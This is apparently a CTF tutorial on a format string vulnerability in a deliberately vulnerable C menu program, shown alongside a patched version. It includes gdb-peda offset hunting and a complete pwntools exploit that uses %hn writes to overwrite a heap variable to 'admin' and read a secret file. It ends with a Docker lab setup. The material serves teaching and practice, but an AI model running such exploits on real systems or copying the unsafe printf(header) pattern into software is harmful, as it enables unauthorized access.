Challenge example
Code example
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void secret() {
char *filename = "./.passwd";
FILE *file = fopen(filename, "r");
if (file == NULL) {
printf("Error opening file.\n");
return;
}
char line[256];
while (fgets(line, sizeof(line), file)) {
printf("%s", line);
}
fclose(file);
}
char *authenticate() {
char password[16];
printf("Enter password: ");
scanf("%15s", password);
if (strcmp(password, "secret") == 0) {
return "admin";
} else {
return "guest";
}
}
void menu(char *user_type) {
int choice;
char header[32] = "Hello World !";
while (1) {
printf("\n--- Menu ---\n");
printf(header);
printf("\n");
printf("1. Change header\n");
if (strcmp(user_type, "admin") == 0) {
printf("2. Read secret\n");
}
printf("0. Exit\n");
printf("Enter your choice: ");
scanf("%1d", &choice);
if (choice == 1) {
// Change the header string
printf("Enter new header: ");
scanf("%30s", header);
} else if (choice == 0) {
// Exit
break;
} else if (choice == 2 && strcmp(user_type, "admin") == 0) {
// Call the secret() function
secret();
} else {
printf("Invalid choice. Try again.\n");
}
}
}
int main() {
char *user_type = malloc(16);
strcpy(user_type, authenticate());
printf("Welcome, %s!\n", user_type);
menu(user_type);
}
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void secret() {
char *filename = "./.passwd";
FILE *file = fopen(filename, "r");
if (file == NULL) {
printf("Error opening file.\n");
return;
}
char line[256];
while (fgets(line, sizeof(line), file)) {
printf("%s", line);
}
fclose(file);
}
char *authenticate() {
char password[16];
printf("Enter password: ");
scanf("%15s", password);
if (strcmp(password, "secret") == 0) {
return "admin";
} else {
return "guest";
}
}
void menu(char *user_type) {
int choice;
char header[32] = "Hello World !";
while (1) {
printf("\n--- Menu ---\n");
printf("%s\n", header);
printf("1. Change header\n");
if (strcmp(user_type, "admin") == 0) {
printf("2. Read secret\n");
}
printf("0. Exit\n");
printf("Enter your choice: ");
scanf("%1d", &choice);
if (choice == 1) {
// Change the header string
printf("Enter new header: ");
scanf("%30s", header);
} else if (choice == 0) {
// Exit
break;
} else if (choice == 2 && strcmp(user_type, "admin") == 0) {
// Call the secret() function
secret();
} else {
printf("Invalid choice. Try again.\n");
}
}
}
int main() {
char *user_type = malloc(16);
strcpy(user_type, authenticate());
printf("Welcome, %s!\n", user_type);
menu(user_type);
}
The objective is to rewrite the user_type
value to "admin" in order to read the secret file
Exploitation
The first step is to identify the offset between the user input used to exploit the format string and the "user_type
" variable into the stack.
Retrieving offset
Retrieving user input
Using the stack
command, it's possible to retrieve the user input location on the stack :
gdb-peda$ stack
0000| 0xffffd340 --> 0x804a08b ("Enter your choice: ")
0004| 0xffffd344 --> 0x804a049 ("admin")
0008| 0xffffd348 --> 0xf7fa7000 --> 0x1e4d6c
0012| 0xffffd34c --> 0xbc2bd800
0016| 0xffffd350 --> 0xffffd398 --> 0xffffd3b8 --> 0x0
0020| 0xffffd354 --> 0xf7dc6830 --> 0x19e5
0024| 0xffffd358 --> 0xf7fa7000 --> 0x1e4d6c
0028| 0xffffd35c ("AAAA") // ==> Here is the user input
It's also possible to search the 0x41414141 value into the stack with the find
command
gdb-peda$ find 0x41414141
Searching for '0x41414141' in: None ranges
Found 2 results, display max 2 items:
[heap] : 0x804d5d0 ("AAAA\n")
[stack] : 0xffffd35c ("AAAA")
Retrieving "user_type"
Using the find
command it's possible to search a specific value into the memory :
gdb-peda$ find guest
Searching for 'guest' in: None ranges
Found 3 results, display max 3 items:
chall : 0x804a04f ("guest")
chall : 0x804b04f ("guest")
[heap] : 0x804d1a0 ("guest")
Due to the malloc
the value is stored into the heap. Here the location address is 0x804d1a0
Still Using the find
command, it's possible to locate this pointer into the stack :
gdb-peda$ find 0x804d1a0
Searching for '0x804d1a0' in: None ranges
Found 3 results, display max 3 items:
[stack] : 0xffffd390 --> 0x804d1a0 ("guest")
[stack] : 0xffffd394 --> 0x804d1a0 ("guest")
[stack] : 0xffffd3ac --> 0x804d1a0 ("guest")
Offset calculation
Then ([pointer stack address] - [user_input stack address]) / 4 = offset
gdb-peda$ p/d (0xffffd3ac - 0xffffd35c) / 4
$2 = 20
the Parameter field of the placeholder is used specify the number of the parameter to display. if this value is over than the amount of parameter, thus it's possible to read arbitrary value on the stack such as using multiple placeholder as explained here.
The possible offset values could be bruteforced by sending a format string with successively increasing offset values, such as "%1$s", "%2$s", "%3$s", and so on. If the output of the program is "guest" when the format string "%x$s" is sent, then the offset value x might be considered valid.
def fuzz(search, type):
# Initialize an empty list to store the offsets that match the search string
offsets = []
p = start()
# Loop through a range of offsets
for i in range(50):
try:
# Generate the payload to test the current offset
payload = f"AAAA%{i}${type}".encode()
# Use the payload to test the current offset
output = menu(p, payload)
# Check if the search string is present in the output
if search in output[1]:
print(f"=> Found with offset : {i} !")
print(f"HEADER = {output[1]}")
# Add the current offset to the list of offsets
offsets.append(i)
except Exception as e:
p = start()
p.close()
return offsets
$ python3 exploit.py
=> Found with offset : 16 !
HEADER = guest
=> Found with offset : 20 !
HEADER = guest
=> Found with offset : 21 !
HEADER = guest
=> Found with offset : 27 !
HEADER = guest
As for retrieving user_type
this fuzzing function allow to retrieve the user_input into the stack :
def fuzz(search, type):
# Initialize an empty list to store the offsets that match the search string
offsets = []
p = start()
try:
# Loop through a range of offsets
for i in range(50):
# Generate the payload to test the current offset
payload = f"AAAA%{i}${type}".encode()
# Use the payload to test the current offset
output = menu(p, payload)
# Check if the search string is present in the output
if search in output[1]:
print(f"=> Found with offset : {i} !")
print(f"HEADER = {output[1]}")
# Add the current offset to the list of offsets
offsets.append(i)
except Exception as e:
p.start()
p.close()
return offsets
=> Found with offset : 7 !
HEADER = AAAA41414141
from pwn import *
context.log_level = "ERROR"
def start():
# Start the program
p = process("./chall")
# Authenticate with the program
authenticate(p)
# Receive output from the program until the "Exit" prompt is received
p.recvuntil('Exit')
# Return the process object
return p
def authenticate(p):
# Send the authentication option to the program
p.sendline('a')
# Receive a response from the program
a = p.recvline()
def menu(p, payload, print_header=False, return_menu=False):
# Send the menu option to the program
p.sendline(b'1')
# Receive a response from the program
a = p.recvline()
# Send the payload to the program
p.sendline(payload)
# Receive a response from the program
a = p.recvline()
# Receive all remaining output from the program until the "Exit" prompt is received
output = p.recvuntil('Exit').decode('utf-8', 'ignore').split('\n')
# Return the output of the program
return output
def fuzz(search, type):
# Initialize an empty list to store the offsets that match the search string
offsets = []
p = start()
# Loop through a range of offsets
for i in range(50):
try:
# Generate the payload to test the current offset
payload = f"AAAA%{i}${type}".encode()
# Use the payload to test the current offset
output = menu(p, payload)
# Check if the search string is present in the output
if search in output[1]:
print(f"=> Found with offset : {i} !")
print(f"HEADER = {output[1]}")
# Add the current offset to the list of offsets
offsets.append(i)
except Exception as e:
p = start()
p.close()
return offsets
offsets_user_type = fuzz("guest", "s")
offset_user_input = fuzz("41414141", "08x")[0]
Editing value
In order to validate the objective, it's possible to directly edit the "user_type
" variable directly ans see the repercussion on the program execution !
gdb-peda$ set *0x804d1a0 = 0x696d6461
gdb-peda$ set *0x804d1a4 = 0x0000006e
gdb-peda$ x 0x804d1a0
0x804d1a0: "admin"
When the process is continued, the "3. read secret" option apear into the menu :
--- Menu ---
Hello World !
1. Change header
2. Exit
3. Read secret
In order to write into the heap, it's necessary to know the address. To do that it's possible to read the pointer into the heap at the offsets previously obtained.
def read_pointer(p, i):
# Generate the payload to read the pointer
payload = f"%{i}$#08x".encode()
# Use the payload to read the pointer
output = menu(p, payload)[1]
# Return the output of the menu function
return output
As explained into the Placeholder page, the %n
format string will be used to write data.
This format string writes the number of characters written so far into an integer pointer parameter.
So, 1768776801 characters must be sent to write 0x696d6461 ("admi" in little endian) at the target address and 230 characters must be sent to write 0x0000006e ("n" in little endian) to the target address + 4. This process is necessary to achieve the goal of writing the word 'admin' at the desired location.
⚠️ However, sending an input of 1768776801 characters is far too lengthy
It is necessary to divide this input into two and send 25697 to write 0x6461 ("ad" in little endian) to the target address and 26989 to write 0x696d ("mi") to the target address +2. This process helps to achieve the goal of writing the desired information at the specified location in a more efficient manner.
In this case, only 2 bytes are sent at a time, however an integer is coded on 4 bytes. Therefore, the use of a short (coded on 2 bytes) is necessary to accurately write 2 bytes. To do this, the %hn
format string must be used.
There is the entire payload composition :
The first 4 bytes are the targeted address. The user input will be used as a pointer for the $n format string
The following bytes will be a placeholder with sufficient padding to write the correct number of bytes for the format string %n. To do this, the placeholder %Xd should be used where X is the amount of necessary bytes to write what is needed.
The number of padding bytes needed is equal to the value we want to write, minus 4. This is because the first 4 bytes of the input are used to specify the target address, so they are not included in the padding.
ex for "ad" :
\xa0\xd\x04\x08 | %25693d | %7$hn
----------------+---------------+----------------------
targeted address| needed amount | format string to write
(little endian) | of char
Here is the function to generate all needed payloads to write the arbitrary value :
def generate_payloads(address, word, offset):
# Initialize an empty list to store the payloads
payloads = []
# Initialize an empty list to store the bytes of the word
b = []
# Loop through the word two characters at a time
for l in range(0,len(word),2):
# Convert the two characters to bytes and add them to the list
b.append(int(bytes(f"{word[l:l+2][::-1]}", 'utf-8').hex(),16))
# Convert the address string to an integer
address = int(address, 16)
# Loop through the list of bytes
for i in range(len(b)):
# Calculate the target address for the current byte
target = p32(address+(i*2))
# Generate the payload to write the current byte to the target address
payload = target + f"%{b[i]-4}d%{offset}$hn".encode()
# Add the payload to the list
payloads.append(payload)
return payloads
And here is the function that use the payloads :
def write(offsets,offset_user_input):
p = start()
for i in offsets:
try:
# Read the pointer at the given offset
address = read_pointer(p, i)
print(f"Targeted : {address}")
# Generate payloads
payloads = generate_payloads(address, "admin", offset_user_input)
for payload in payloads:
# Use the payload to write to the target address
output = menu(p, payload)
# Check if the secret has been accessed
if "secret" in output[3]:
print("pwned !")
# Read the secret
read_secret(p)
exit(0)
except Exception as e:
print(e)
p = start()
p.close()
✅ All packaged, the secret appear :
$ python3 exploit.py
=> Found with offset : 16 !
HEADER = AAAAguest
=> Found with offset : 20 !
HEADER = AAAAguest
=> Found with offset : 21 !
HEADER = AAAAguest
=> Found with offset : 27 !
HEADER = AAAAguest
=> Found with offset : 7 !
HEADER = AAAA41414141
Targeted : 0x804a04f
Targeted : 0x8b731a0
pwned !
SECRET = SuperPassword!!
from pwn import *
context.log_level = "ERROR"
def start():
# Start the program
p = process("../chall")
# Authenticate with the program
authenticate(p)
# Receive output from the program until the "Exit" prompt is received
p.recvuntil('Exit')
# Return the process object
return p
def authenticate(p):
# Send the authentication option to the program
p.sendline('a')
# Receive a response from the program
a = p.recvline()
def read_secret(p):
# Send the secret-reading option to the program
p.sendline(b"2")
# Receive all remaining output from the program, with a timeout of 1 second
output = p.recvall(timeout=1).decode('utf-8','ignore').split("\n")[1].split(" ")[-1]
# Print the secret
print(f"SECRET = {output}")
def menu(p, payload, print_header=False, return_menu=False):
# Send the menu option to the program
p.sendline(b'1')
# Receive a response from the program
a = p.recvline()
# Send the payload to the program
p.sendline(payload)
# Receive a response from the program
a = p.recvline()
# Receive all remaining output from the program until the "Exit" prompt is received
output = p.recvuntil('Exit').decode('utf-8', 'ignore').split('\n')
# Return the output of the program
return output
def fuzz(search, type):
# Initialize an empty list to store the offsets that match the search string
offsets = []
p = start()
# Loop through a range of offsets
for i in range(50):
try:
# Generate the payload to test the current offset
payload = f"AAAA%{i}${type}".encode()
# Use the payload to test the current offset
output = menu(p, payload)
# Check if the search string is present in the output
if search in output[1]:
print(f"=> Found with offset : {i} !")
print(f"HEADER = {output[1]}")
# Add the current offset to the list of offsets
offsets.append(i)
except Exception as e:
p = start()
p.close()
return offsets
def read_pointer(p, i):
# Generate the payload to read the pointer
payload = f"%{i}$#08x".encode()
# Use the payload to read the pointer
output = menu(p, payload)[1]
# Return the output of the menu function
return output
def generate_payloads(address, word, offset):
# Initialize an empty list to store the payloads
payloads = []
# Initialize an empty list to store the bytes of the word
b = []
# Loop through the word two characters at a time
for l in range(0,len(word),2):
# Convert the two characters to bytes and add them to the list
b.append(int(bytes(f"{word[l:l+2][::-1]}", 'utf-8').hex(),16))
# Convert the address string to an integer
address = int(address, 16)
# Loop through the list of bytes
for i in range(len(b)):
# Calculate the target address for the current byte
target = p32(address+(i*2))
# Generate the payload to write the current byte to the target address
payload = target + f"%{b[i]-4}d%{offset}$hn".encode()
# Add the payload to the list
payloads.append(payload)
return payloads
def write(offsets,offset_user_input):
p = start()
for i in offsets:
try:
# Read the pointer at the given offset
address = read_pointer(p, i)
print(f"Targeted : {address}")
# Generate payloads to write the string "admin" at the target address
payloads = generate_payloads(address, "admin", offset_user_input)
for payload in payloads:
# Use the payload to write to the target address
output = menu(p, payload)
# Check if the secret has been accessed
if "secret" in output[3]:
print("pwned !")
# Read the secret
read_secret(p)
exit(0)
except Exception as e:
print(e)
p = start()
p.close()
offsets_user_type = fuzz("guest", "s")
offset_user_input = fuzz("41414141", "08x")[0]
write(offsets_user_type,offset_user_input)
It's also possible to overwrite the value of the saved instruction pointer into the stack to jump directly into the "secret" function when closing the menu instead of return to the main function.
Exercice
If you want to try this exploit by yourself, you can pull this docker image :
docker pull thectfrecipes/pwn:data_edit
Deploy the image using the followed command :
docker run --name format_string_data_edit -it --rm -d -p 3000:3000 thectfrecipes/pwn:data_edit
Access to the web shell with your browser at the address : http://localhost:3000/
login: challenge
password: password
Last updated